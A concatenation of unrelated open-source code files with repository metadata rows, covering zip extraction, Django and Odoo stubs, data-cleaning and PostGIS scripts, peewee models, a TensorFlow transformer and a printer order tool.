return
utils.sts(f"Logic error: Failed to find ballot_id {ballot_id} in ballot archive.", 0)
traceback.print_stack()
sys.exit(1)
def extract_file(archive, file_name, dest_filepath):
""" given zip archive which is already open, extract a single file 'file_name' and write it to dest filepath.
Note that zipfile.extract() does not work because it always reproduces the entire path.
"""
newfilebytes = bytes(archive.read(adjust_filepath_separators(archive, file_name)))
fh = open(dest_filepath, "wb")
fh.write(newfilebytes)
fh.close()
|
[
"robertoroie123@gmail.com"
] |
robertoroie123@gmail.com
|
52c7f86beb60a85355457f8fc03219f7a0237894
|
4a81ae61f744ba95861767ed9344b66b392eceda
|
/wf_last/models/__init__.py
|
0092a3be45ee9c4799790bcdaaa11c7ff556859f
|
[] |
no_license
|
appsgateteam/Waterfall
|
37f7b11ee9a30eaa9f23521e9f437f2a0865e44d
|
641588582c3974390098f1ae331d5048bd549bb0
|
refs/heads/master
| 2023-02-02T21:05:06.098464
| 2020-12-27T08:33:29
| 2020-12-27T08:33:29
| 283,480,124
| 0
| 2
| null | 2020-12-27T08:33:30
| 2020-07-29T11:25:38
|
Python
|
UTF-8
|
Python
| false
| false
| 116
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import wf
|
[
"56960524+Ziad-Monim@users.noreply.github.com"
] |
56960524+Ziad-Monim@users.noreply.github.com
|
4eb785714e385a17901264575757a9da0fa57fb7
|
b88288f19a3094439a86e22cdf4fccfd64072f59
|
/google_dependency/urls.py
|
eb29f857d3cf17663a25399cdbea250f2de7792d
|
[
"MIT"
] |
permissive
|
EdgarSun/Django-Demo
|
96c9ca46027db5321fd76e239afd6a9edb4cf288
|
7775d5d6f8d4a0e6c4a6b042bf89ce19b15f2d8e
|
refs/heads/master
| 2016-09-02T19:59:23.350255
| 2013-07-17T03:35:35
| 2013-07-17T03:35:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
from django.conf.urls.defaults import *
urlpatterns = patterns('google_dependency.blobstore_handler',
(r'^$', 'upload_handler'),
(r'^(?P<pk>\d+)/(?P<entityID>\d+)$', 'upload_handler'),
(r'^media/(?P<pk>\d+)$', 'retrieve_handler'),
(r'^media/(?P<pk>\d+)/(?P<size>\d+)/(?P<crop>\d+)$', 'retrieve_handler'),
(r'^delete/(?P<pk>\d+)/$', 'delete_handler'),
)
|
[
"edgar@SUNYAN-WS.ccp.ad.local"
] |
edgar@SUNYAN-WS.ccp.ad.local
|
b0bbbe368d0d4a2c61ed0d5b09e17455b8212fd0
|
cbc39b8013558a329cd885042002838828103c1a
|
/milestone1/outlier.py
|
0f1ee1ef0fd373e7622f6e3eded507c7acac742d
|
[] |
no_license
|
cjl99/Kaggle-Rental-Listing
|
8914574866f8b07f8dfaf26280eb544c4da19baf
|
5d96dc9915e5e515b41a91cd3a2a49c059a7f749
|
refs/heads/master
| 2022-12-27T20:17:00.970984
| 2020-10-16T07:47:46
| 2020-10-16T07:47:46
| 237,680,260
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,714
|
py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import time
import basic_func as func
# -----------------outlier--------------
# find listing_id is unique or not
(listing_id, features, values, train_df) = func.load_unicef_data("mid_train.json")
print(train_df.shape)
# drop outlier of high price(>20000)
# print(train_df)
ulimit = 20000 # find out from figure in PART1
outlier_price = train_df.loc[train_df["price"] > ulimit, ["listing_id"]]
print("The number of outliers in price: " + str(outlier_price.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_price["listing_id"])]
# print(df)
# drop outlier of longitude(<1% and >99%)
llimit = np.percentile(train_df['longitude'], 1)
ulimit = np.percentile(train_df['longitude'], 99)
outlier_longitude = train_df.loc[train_df["longitude"] > ulimit, ["listing_id"]]
outlier_longitude2 = train_df.loc[train_df["longitude"] < llimit, ["listing_id"]]
print("The number of outliers in longitude: " + str(outlier_longitude.shape[0] + outlier_longitude2.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_longitude["listing_id"])]
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_longitude2["listing_id"])]
# drop outlier of latitude(<1% and >99%)
llimit = np.percentile(train_df['latitude'], 1)
ulimit = np.percentile(train_df['latitude'], 99)
outlier_latitude = train_df.loc[train_df["latitude"] > ulimit, ["listing_id"]]
outlier_latitude2 = train_df.loc[train_df["latitude"] < llimit, ["listing_id"]]
print("The number of outliers in latitude: " + str(outlier_latitude.shape[0] + outlier_latitude2.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_latitude["listing_id"])]
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_latitude2["listing_id"])]
# years outlier
y = features.index('created')
timeArray = list()
years = list()
for value in values[:, y]:
timeArray.append(time.strptime(value, "%Y-%m-%d %H:%M:%S"))
for time in timeArray:
years.append(time.tm_year)
count = 0
for i in range(len(years)):
if years[i] != 2016:
count = count + 1
print("The number of created not in 2016: " + str(count)) # result is 0
# bathroom outlier
fig_bed = plt.figure(num='fig_bath')
plt.figure(num='fig_bath')
plt.scatter(range(train_df['bathrooms'].shape[0]), np.sort(train_df['bathrooms']))
plt.xlabel('index', fontsize=12)
plt.ylabel('bathroom', fontsize=12)
plt.show()
# drop outlier of bathroom(<1% and >99%)
ulimit = 8 # get from figure
outlier_bathroom = train_df.loc[train_df['bathrooms'] > ulimit, ["listing_id"]]
print("The number of outliers in bathroom: " + str(outlier_bathroom.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_bathroom["listing_id"])]
# --------------------
# bedrooms outlier
fig_bed = plt.figure(num='fig_bed')
plt.figure(num='fig_bed')
plt.scatter(range(train_df['bedrooms'].shape[0]), np.sort(train_df['bedrooms']))
plt.xlabel('index', fontsize=12)
plt.ylabel('bedrooms', fontsize=12)
plt.show()
print("The number of outliers in bathroom: " + str(0))
print(train_df.shape)
train_df.to_json("final_train.json")
# ------------------
# display_address outlier
# p = features.index("display_address")
# q = features.index("description")
# length_disp_addr = list()
# for i in range(train_df['display_address'].shape[0]):
# length_disp_addr.append(len(values[i, p]))
# fig_disp_addr = plt.figure(num='fig_disp_addr')
# plt.figure(num='fig_disp_addr')
# plt.scatter(range(len(length_disp_addr)), np.sort(length_disp_addr))
# plt.xlabel('index', fontsize=12)
# plt.ylabel('display_address lenhgth', fontsize=12)
# plt.show()
#
# deal with missing values in street_address and display_address
# p = features.index("display_address")
# q = features.index("street_address")
# disp_addr = values[:, p]
# street_addr = values[:, q]
# count = 0
# for i in range(disp_addr.shape[0]):
# # display_address is "" street address is "", assign street address to display address without number
# if values[i, p] == "" and values[i, q] != "":
# count = count + 1
# temp_str = values[i, q]
# for j in range(len(temp_str)):
# if temp_str[j] == " ":
# values[i, p] = temp_str[j + 1:]
# # print(temp_str + "------> " + values[i, p])
# break
#
#
# count = 0
# for i in range(street_addr.shape[0]):
# if values[i, q] == "" and values[i, p] != "":
# count = count + 1
# values[i, q] = values[i, p]
# print(values[i, p] + "------> " + values[i, q])
# print(count)
|
[
"noreply@github.com"
] |
cjl99.noreply@github.com
|
5254d72522b50843e063de15fc722b54232c0aad
|
7dc80048f72e106f977b49ea882c63cc9623e3ef
|
/notebooks/production/Y2018M06D04_RH_Arid_PostGIS_30sPfaf06_V01.py
|
1b5ca3dff79cd1e2a70ff97152e149e19c8c352e
|
[] |
no_license
|
YanCheng-go/Aqueduct30Docker
|
8400fdea23bfd788f9c6de71901e6f61530bde38
|
6606fa03d145338d48101fc53ab4a5fccf3ebab2
|
refs/heads/master
| 2022-12-16T03:36:25.704103
| 2020-09-09T14:38:28
| 2020-09-09T14:38:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,324
|
py
|
# coding: utf-8
# In[1]:
""" Add column for arid subbasins.
-------------------------------------------------------------------------------
Author: Rutger Hofste
Date: 20180604
Kernel: python35
Docker: rutgerhofste/gisdocker:ubuntu16.04
Args:
TESTING (Boolean) : Toggle testing case.
SCRIPT_NAME (string) : Script name.
OUTPUT_VERSION (integer) : output version.
DATABASE_ENDPOINT (string) : RDS or postGreSQL endpoint.
DATABASE_NAME (string) : Database name.
TABLE_NAME_AREA_30SPFAF06 (string) : Table name used for areas. Must exist
on same database as used in rest of script.
S3_INPUT_PATH_RIVERDISCHARGE (string) : AWS S3 input path for
riverdischarge.
S3_INPUT_PATH_DEMAND (string) : AWS S3 input path for
demand.
"""
TESTING = 1
OVERWRITE_OUTPUT = 1
SCRIPT_NAME = 'Y2018M06D04_RH_Arid_PostGIS_30sPfaf06_V01'
OUTPUT_VERSION = 1
THRESHOLD_ARID_YEAR = 0.03 #units are m/year, threshold defined by Aqueduct 2.1
THRESHOLD_LOW_WATER_USE_YEAR = 0.012 #units are m/year, threshold defined by Aqueduct 2.1
DATABASE_ENDPOINT = "aqueduct30v05.cgpnumwmfcqc.eu-central-1.rds.amazonaws.com"
DATABASE_NAME = "database01"
INPUT_TABLE_NAME = "y2018m06d01_rh_moving_average_postgis_30spfaf06_v01_v01"
OUTPUT_TABLE_NAME = SCRIPT_NAME.lower() + "_v{:02.0f}".format(OUTPUT_VERSION)
print("Input Table: " , INPUT_TABLE_NAME,
"\nOutput Table: " , OUTPUT_TABLE_NAME)
# In[2]:
import time, datetime, sys
dateString = time.strftime("Y%YM%mD%d")
timeString = time.strftime("UTC %H:%M")
start = datetime.datetime.now()
print(dateString,timeString)
sys.version
# In[3]:
# imports
import re
import os
import numpy as np
import pandas as pd
import aqueduct3
from datetime import timedelta
from sqlalchemy import *
pd.set_option('display.max_columns', 500)
# In[4]:
F = open("/.password","r")
password = F.read().splitlines()[0]
F.close()
engine = create_engine("postgresql://rutgerhofste:{}@{}:5432/{}".format(password,DATABASE_ENDPOINT,DATABASE_NAME))
connection = engine.connect()
if OVERWRITE_OUTPUT:
sql = text("DROP TABLE IF EXISTS {};".format(OUTPUT_TABLE_NAME))
result = engine.execute(sql)
# In[5]:
if TESTING:
sql = "CREATE TABLE {} AS SELECT * FROM {} WHERE pfafid_30spfaf06 < 130000 ;".format(OUTPUT_TABLE_NAME,INPUT_TABLE_NAME)
else:
sql = "CREATE TABLE {} AS SELECT * FROM {};".format(OUTPUT_TABLE_NAME,INPUT_TABLE_NAME)
result = engine.execute(sql)
# In[6]:
sql = "ALTER TABLE {} ADD COLUMN arid_boolean_30spfaf06 integer DEFAULT 0".format(OUTPUT_TABLE_NAME)
result = engine.execute(sql)
# In[11]:
threshold_arid_month = THRESHOLD_ARID_YEAR / 12
threshold_low_water_use_month = THRESHOLD_LOW_WATER_USE_YEAR / 12
print(threshold_arid_month)
# In[10]:
# Set Arid for monthly columns
sql = "UPDATE y2018m06d04_rh_arid_postgis_30spfaf06_v01_v01 SET arid_boolean_30spfaf06 = 1 WHERE temporal_resolution = 'month' AND ma10_riverdischarge_m_30spfaf06 < {};".format(threshold_arid_month)
result = engine.execute(sql)
# In[13]:
# Set Arid for year columns
sql = "UPDATE y2018m06d04_rh_arid_postgis_30spfaf06_v01_v01 SET arid_boolean_30spfaf06 = 1 WHERE temporal_resolution = 'year' AND ma10_riverdischarge_m_30spfaf06 < {};".format(THRESHOLD_ARID_YEAR)
result = engine.execute(sql)
# In[ ]:
|
[
"rutgerhofste@gmail.com"
] |
rutgerhofste@gmail.com
|
29360104129bcdd0eb4af42a8b6c91fe670212a8
|
441785c5065ce3709c69ddfc39ce5eb99400516b
|
/py/db.py
|
5c0f839c3aa703d4adf8dbf05436e24c94028149
|
[
"MIT"
] |
permissive
|
val06/restpie3
|
0423f94fa5f8bb95e29721721314d4e08882f1b9
|
bd63d26658988febfaa39bce192257fb18e4110c
|
refs/heads/master
| 2022-04-30T02:36:55.434505
| 2020-03-25T19:56:46
| 2020-03-25T19:56:46
| 249,764,844
| 0
| 0
|
MIT
| 2020-03-24T16:51:36
| 2020-03-24T16:51:35
| null |
UTF-8
|
Python
| false
| false
| 5,542
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""db.py: Models and functions for accessing the database
- using peewee orm
- preferably have all SQL in this file
Author: Tomi.Mickelsson@iki.fi
http://docs.peewee-orm.com/en/latest/peewee/querying.html
http://docs.peewee-orm.com/en/latest/peewee/playhouse.html#postgres-ext
"""
from peewee import *
from playhouse.shortcuts import model_to_dict
from playhouse.postgres_ext import PostgresqlExtDatabase, ArrayField, BinaryJSONField, BooleanField, JSONField
# support for arrays of uuid
import psycopg2.extras
psycopg2.extras.register_uuid()
from flask import abort
import config
import logging
log = logging.getLogger("db")
database = PostgresqlExtDatabase(config.DATABASE_NAME,
user=config.DATABASE_USER, password=config.DATABASE_PASSWORD,
host=config.DATABASE_HOST, port=config.DATABASE_PORT)
# --------------------------------------------------------------------------
# Base model and common methods
class BaseModel(Model):
"""Base class for all database models."""
# exclude these fields from the serialized dict
EXCLUDE_FIELDS = []
def serialize(self):
"""Serialize the model into a dict."""
d = model_to_dict(self, recurse=False, exclude=self.EXCLUDE_FIELDS)
d["id"] = str(d["id"]) # unification: id is always a string
return d
class Meta:
database = database
def get_object_or_404(model, **kwargs):
"""Retrieve a single object or abort with 404."""
try:
return model.get(**kwargs)
except model.DoesNotExist:
log.warning("NO OBJECT {} {}".format(model, kwargs))
abort(404)
def get_object_or_none(model, **kwargs):
"""Retrieve a single object or return None."""
try:
return model.get(**kwargs)
except model.DoesNotExist:
return None
# --------------------------------------------------------------------------
# USER
class User(BaseModel):
# Should user.id be an integer or uuid? Both have pros and cons.
# Since user.id is sensitive data, I selected uuid here.
id = UUIDField(primary_key=True)
id.auto_increment = True # is auto generated by server
email = TextField()
password = TextField()
first_name = TextField()
last_name = TextField()
role = TextField()
tags = ArrayField(TextField)
created = DateTimeField()
modified = DateTimeField()
EXCLUDE_FIELDS = [password] # never expose password
def is_superuser(self):
return self.role == "superuser"
def full_name(self):
return "{} {}".format(self.first_name, self.last_name or '')
def serialize(self):
"""Serialize this object to dict/json."""
d = super(User, self).serialize()
# add extra data
d["fullname"] = self.full_name()
d["tags"] = self.tags or [] # never None
return d
def __str__(self):
return "<User {}, {}, role={}>".format(self.id,
self.email, self.role)
class Meta:
db_table = 'users'
def get_user(uid):
"""Return user object or throw."""
return get_object_or_404(User, id=uid)
def get_user_by_email(email):
"""Return user object or None"""
if not email:
return None
try:
# return User.select().where(User.email == email).get()
# case insensitive query
sql = "SELECT * FROM users where LOWER(email) = LOWER(%s) LIMIT 1"
args = (email,)
return list(User.raw(sql, args))[0]
except:
return None
def query_users(page=0, limit=1000, search=None):
"""Return list of users. Desc order"""
page = int(page)
limit = int(limit)
q = User.select()
if search:
search = "%"+search+"%"
q = q.where(User.first_name ** search | User.last_name ** search |
User.email ** search)
q = q.paginate(page, limit).order_by(User.id.desc())
return q
# --------------------------------------------------------------------------
# MOVIE - just an example for CRUD API...
class Movie(BaseModel):
#id - automatic
title = TextField()
director = TextField()
created = DateTimeField()
modified = DateTimeField()
creator = ForeignKeyField(db_column='creator', null=True,
model=User, to_field='id')
class Meta:
db_table = 'movies'
def get_movie(id):
"""Return Movie or throw."""
return get_object_or_404(Movie, id=id)
def query_movies(page=None, limit=None, search='', creator=None):
"""Return list of movies which match given filters."""
page = page or 0
limit = limit or 1000
q = Movie.select()
if search:
search = "%"+search+"%"
q = q.where(Movie.title ** search | Movie.director ** search)
if creator:
q = q.where(Movie.creator == creator)
q = q.paginate(page, limit).order_by(Movie.id)
return q
def query_unique_directors():
"""Return list of unique directors. An example of a raw SQL query."""
sql = "SELECT DISTINCT(director) FROM movies"
rq = database.execute_sql(sql)
return [x[0] for x in rq]
# --------------------------------------------------------------------------
if __name__ == '__main__':
# quick adhoc tests
logging.basicConfig(level=logging.DEBUG)
u = User(first_name="tomi")
u.email = "myemail@example.org"
u.save(force_insert=True)
print(u)
print(list(query_users(0, "10", ".com")))
print(list(query_movies()))
print(query_unique_directors())
|
[
"atomi@iki.fi"
] |
atomi@iki.fi
|
61f008ec7179198c26823fb146e725da539d8e95
|
8f982d411270ea2bd77f93e27ff122ae57ea9189
|
/transf_model.py
|
455053ba03b9fb304d7c08b72c66a51dd188fa6f
|
[] |
no_license
|
axe76/Speech-To-Text-Implementations
|
ad808f7cfa3782fc6a8466e5bba2c16ebe8032fc
|
0e5423340cfec48f44d501285a078f8e2c3d7ab0
|
refs/heads/main
| 2023-08-13T16:55:36.895593
| 2021-10-02T11:33:18
| 2021-10-02T11:33:18
| 412,775,404
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,316
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 24 12:21:48 2021
@author: sense
"""
import tensorflow as tf
import numpy as np
def get_angles(pos, i, d_model):
angle_rates = 1 / np.power(10000, (2 * (i//2)) / np.float32(d_model))
return pos * angle_rates
def positional_encoding_1d(position, d_model):
angle_rads = get_angles(np.arange(position)[:, np.newaxis],
np.arange(d_model)[np.newaxis, :],
d_model)
angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])
angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])
pos_encoding = angle_rads[np.newaxis, ...]
return tf.cast(pos_encoding, dtype=tf.float32)
def positional_encoding_2d(row,col,d_model):
assert d_model % 2 == 0
row_pos = np.repeat(np.arange(row),col)[:,np.newaxis]
col_pos = np.repeat(np.expand_dims(np.arange(col),0),row,axis=0).reshape(-1,1)
angle_rads_row = get_angles(row_pos,np.arange(d_model//2)[np.newaxis,:],d_model//2)
angle_rads_col = get_angles(col_pos,np.arange(d_model//2)[np.newaxis,:],d_model//2)
angle_rads_row[:, 0::2] = np.sin(angle_rads_row[:, 0::2])
angle_rads_row[:, 1::2] = np.cos(angle_rads_row[:, 1::2])
angle_rads_col[:, 0::2] = np.sin(angle_rads_col[:, 0::2])
angle_rads_col[:, 1::2] = np.cos(angle_rads_col[:, 1::2])
pos_encoding = np.concatenate([angle_rads_row,angle_rads_col],axis=1)[np.newaxis, ...]
return tf.cast(pos_encoding, dtype=tf.float32)
print(positional_encoding_2d(5,4,512))
print(positional_encoding_1d(100,512))
def create_padding_mask(seq):
seq = tf.cast(tf.math.equal(seq, 0), tf.float32)
return seq[:, tf.newaxis, tf.newaxis, :] # (batch_size, 1, 1, seq_len)
def create_look_ahead_mask(size):
mask = 1 - tf.linalg.band_part(tf.ones((size, size)), -1, 0)
return mask # (seq_len, seq_len)
def scaled_dot_product_attention(q, k, v, mask):
matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)
dk = tf.cast(tf.shape(k)[-1], tf.float32)
scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)
if mask is not None:
scaled_attention_logits += (mask * -1e9)
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)
output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)
return output, attention_weights
class MultiHeadAttention(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads):
super(MultiHeadAttention, self).__init__()
self.num_heads = num_heads
self.d_model = d_model
assert d_model % self.num_heads == 0
self.depth = d_model // self.num_heads
self.wq = tf.keras.layers.Dense(d_model)
self.wk = tf.keras.layers.Dense(d_model)
self.wv = tf.keras.layers.Dense(d_model)
self.dense = tf.keras.layers.Dense(d_model)
def split_heads(self, x, batch_size):
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
def call(self, v, k, q, mask=None):
batch_size = tf.shape(q)[0]
q = self.wq(q) # (batch_size, seq_len, d_model)
k = self.wk(k) # (batch_size, seq_len, d_model)
v = self.wv(v) # (batch_size, seq_len, d_model)
q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)
k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)
v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)
scaled_attention, attention_weights = scaled_dot_product_attention(q, k, v, mask)
scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)
concat_attention = tf.reshape(scaled_attention,
(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)
output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)
return output, attention_weights
def point_wise_feed_forward_network(d_model, dff):
return tf.keras.Sequential([
tf.keras.layers.Dense(dff, activation='relu'), # (batch_size, seq_len, dff)
tf.keras.layers.Dense(d_model) # (batch_size, seq_len, d_model)
])
class EncoderLayer(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, dff, rate=0.1):
super(EncoderLayer, self).__init__()
self.mha = MultiHeadAttention(d_model, num_heads)
self.ffn = point_wise_feed_forward_network(d_model, dff)
self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.dropout1 = tf.keras.layers.Dropout(rate)
self.dropout2 = tf.keras.layers.Dropout(rate)
def call(self, x, training, mask=None):
attn_output, _ = self.mha(x, x, x, mask) # (batch_size, input_seq_len, d_model)
attn_output = self.dropout1(attn_output, training=training)
out1 = self.layernorm1(x + attn_output) # (batch_size, input_seq_len, d_model)
ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)
ffn_output = self.dropout2(ffn_output, training=training)
out2 = self.layernorm2(out1 + ffn_output) # (batch_size, input_seq_len, d_model)
return out2
class DecoderLayer(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, dff, rate=0.1):
super(DecoderLayer, self).__init__()
self.mha1 = MultiHeadAttention(d_model, num_heads)
self.mha2 = MultiHeadAttention(d_model, num_heads)
self.ffn = point_wise_feed_forward_network(d_model, dff)
self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.dropout1 = tf.keras.layers.Dropout(rate)
self.dropout2 = tf.keras.layers.Dropout(rate)
self.dropout3 = tf.keras.layers.Dropout(rate)
def call(self, x, enc_output, training,look_ahead_mask=None, padding_mask=None):
attn1, attn_weights_block1 = self.mha1(x, x, x, look_ahead_mask) # (batch_size, target_seq_len, d_model)
attn1 = self.dropout1(attn1, training=training)
out1 = self.layernorm1(attn1 + x)
attn2, attn_weights_block2 = self.mha2(enc_output, enc_output, out1, padding_mask)
attn2 = self.dropout2(attn2, training=training)
out2 = self.layernorm2(attn2 + out1) # (batch_size, target_seq_len, d_model)
ffn_output = self.ffn(out2) # (batch_size, target_seq_len, d_model)
ffn_output = self.dropout3(ffn_output, training=training)
out3 = self.layernorm3(ffn_output + out2) # (batch_size, target_seq_len, d_model)
return out3, attn_weights_block1, attn_weights_block2
class Encoder(tf.keras.layers.Layer):
def __init__(self, num_layers, d_model, num_heads, dff, pe_dim,rate=0.1):
super(Encoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.embedding = tf.keras.layers.Dense(self.d_model,activation='relu')
self.pos_encoding = positional_encoding_1d(pe_dim,self.d_model)
self.enc_layers = [EncoderLayer(d_model, num_heads, dff, rate) for _ in range(num_layers)]
self.dropout = tf.keras.layers.Dropout(rate)
def call(self, x, training, mask=None):
seq_len = tf.shape(x)[1]
x = self.embedding(x) # (batch_size, input_seq_len(H*W), d_model)
x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))
x += self.pos_encoding[:, :seq_len, :]
x = self.dropout(x, training=training)
for i in range(self.num_layers):
x = self.enc_layers[i](x, training, mask)
return x # (batch_size, input_seq_len, d_model)
class Decoder(tf.keras.layers.Layer):
def __init__(self, num_layers,d_model,num_heads,dff, target_vocab_size, maximum_position_encoding, rate=0.1):
super(Decoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.embedding = tf.keras.layers.Embedding(target_vocab_size, d_model)
self.pos_encoding = positional_encoding_1d(maximum_position_encoding, d_model)
#Here it is 1d as input to decoder is caption words
self.dec_layers = [DecoderLayer(d_model, num_heads, dff, rate)
for _ in range(num_layers)]
self.dropout = tf.keras.layers.Dropout(rate)
def call(self, x, enc_output, training,look_ahead_mask=None, padding_mask=None):
seq_len = tf.shape(x)[1]
attention_weights = {}
x = self.embedding(x) # (batch_size, target_seq_len, d_model)
x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))
x += self.pos_encoding[:, :seq_len, :]
x = self.dropout(x, training=training)
for i in range(self.num_layers):
x, block1, block2 = self.dec_layers[i](x, enc_output, training,
look_ahead_mask, padding_mask)
attention_weights['decoder_layer{}_block1'.format(i+1)] = block1
attention_weights['decoder_layer{}_block2'.format(i+1)] = block2
return x, attention_weights
class Transformer(tf.keras.Model):
def __init__(self, num_layers, d_model, num_heads, dff,pe_dim,
target_vocab_size,max_pos_encoding, rate=0.1):
super(Transformer, self).__init__()
self.encoder = Encoder(num_layers, d_model, num_heads, dff,pe_dim, rate)
self.decoder = Decoder(num_layers, d_model, num_heads, dff,
target_vocab_size,max_pos_encoding, rate)
self.final_layer = tf.keras.layers.Dense(target_vocab_size)
def call(self, inp, tar, training,look_ahead_mask=None,dec_padding_mask=None,enc_padding_mask=None ):
enc_output = self.encoder(inp, training, enc_padding_mask) # (batch_size, inp_seq_len, d_model )
dec_output, attention_weights = self.decoder(tar, enc_output, training, look_ahead_mask, dec_padding_mask)
final_output = self.final_layer(dec_output) # (batch_size, tar_seq_len, target_vocab_size)
return final_output, attention_weights
|
[
"noreply@github.com"
] |
axe76.noreply@github.com
|
838e9fe624e2fe600df5cb0d05cf9c342cd5bf7d
|
37cb5a09ff38e36b19fa82c33fa040e2b2d67cee
|
/order_creation_tool.py
|
8b193e2af3d9b54efbd71722e2db289554d4621a
|
[] |
no_license
|
Jeffrey-P-McAteer/dtg-printer-tool
|
21580c46e4ec9224f1ebafa75426626519c7726f
|
f51d9350312794a632e91bc5915657454738f957
|
refs/heads/master
| 2023-08-02T20:09:31.676761
| 2021-09-23T09:23:13
| 2021-09-23T09:23:13
| 338,182,872
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,152
|
py
|
import sys
import csv
import json
import os
import traceback
import time
# Change to the windows folder that the ripping software watches for new rip orders.
AUTORIP_XML_IN_DIRECTORY = r'C:\Users\17044\Desktop\test automation\hotfolder'
# Change "X:" to the location of the directory holding new order .csv files
PRE_RIP_ORDERS_CSV_DIR = r'C:\Users\17044\Downloads'
# For each line in each .csv file, the ItemCode
# column will be read + this directory will be searched for a
# .png or .jpg file containing "ItemCode" anywhere in the name.
PRE_RIP_ORDERS_IMAGES_DIR = r'C:\Users\17044\Downloads'
# For testing
if 'AUTORIP_XML_IN_DIRECTORY' in os.environ:
AUTORIP_XML_IN_DIRECTORY = os.environ['AUTORIP_XML_IN_DIRECTORY']
# For testing
if 'PRE_RIP_ORDERS_CSV_DIR' in os.environ:
PRE_RIP_ORDERS_CSV_DIR = os.environ['PRE_RIP_ORDERS_CSV_DIR']
# For testing
if 'PRE_RIP_ORDERS_IMAGES_DIR' in os.environ:
PRE_RIP_ORDERS_IMAGES_DIR = os.environ['PRE_RIP_ORDERS_IMAGES_DIR']
def clear_screen():
os.system('cls' if os.name=='nt' else 'clear')
def get_user_input(prompt='> '):
if sys.version_info[0] < 3:
return raw_input(prompt)
else:
return input(prompt)
def get_user_file_pick():
if sys.version_info[0] < 3:
import Tkinter, tkFileDialog
root = Tkinter.Tk()
root.withdraw()
return tkFileDialog.askopenfilename()
else:
import tkinter
from tkinter import filedialog
return filedialog.askopenfilename()
def search_for_prerip_image(name):
"""
Searches PRE_RIP_ORDERS_IMAGES_DIR and returns the first file ending in .png or .jpg
which contains "name" in its filename.
"""
for dirpath, dirnames, filenames in os.walk(PRE_RIP_ORDERS_IMAGES_DIR):
for file in filenames:
if name in file.lower() and (file.lower().endswith('.png') or file.lower().endswith('.jpg')):
# We found it!
return os.path.join(dirpath, file)
return None
def create_order_rip_xml_request(order_csv_file):
print('Reading orders from {}'.format(order_csv_file))
with open(order_csv_file, 'r') as fd:
reader = csv.DictReader(fd)
for row in reader:
try:
# Debugging
# print(json.dumps(row, sort_keys=True, indent=4))
item_code = row['ItemCode']
item_name = row['ItemName']
# Handle error case from the .csv having 2x headers.
if item_name.strip() == 'ItemName':
continue
print('Creating rip order for item "{}" ()'.format(item_name, item_code))
lead_time = row.get('LeadTime', '')
print_category = row.get('U_ARGNS_CATEGORY', '')
columns = row.get('U_ARGNS_COL', '')
art_type = row.get('U_ARGNS_ART_TYPE', '')
graphic_category = row.get('U_ARGNS_GRAPHIC_CAT', '')
graphic_type = row.get('U_ARGNS_GRAPHIC_TYPE', '')
number_of_colors = row.get('U_ARGNS_NUM_COLORS', '')
material = row.get('U_ARGNS_MATERIAL', '')
height = row.get('U_ARGNS_ART_TYPE_SIZE_HEIGHT', '')
width = row.get('U_ARGNS_ART_TYPE_SIZE_WIDTH', '')
print('Lead Time = {}'.format(lead_time))
print('Category = {}'.format(print_category))
print('Columns = {}'.format(columns))
print('Art Type = {}'.format(art_type))
print('Graphic Category = {}'.format(graphic_category))
print('Graphic Type = {}'.format(graphic_type))
print('# of colors = {}'.format(number_of_colors))
if not material:
print('Material is empty! Please input material manually (eg "AAA of the Loom white, L" w/o quotes):')
material = get_user_input('material: ')
print('material = {}'.format(material))
if not width:
print('Width is empty! Please input rip width manually:')
width = get_user_input('width: ')
if not height:
print('Height is empty! Please input rip height manually:')
height = get_user_input('height: ')
print('width = {}'.format(width))
print('height = {}'.format(height))
# TODO auto-map x and y from some known profiles
x = row.get('y', '')
if not x:
print('X is empty! Please input x manually (0=left of shirt, ???=right):')
x = get_user_input('x: ')
y = row.get('y', '')
if not y:
print('Y is empty! Please input y manually (0=top of shirt, ???=bottom):')
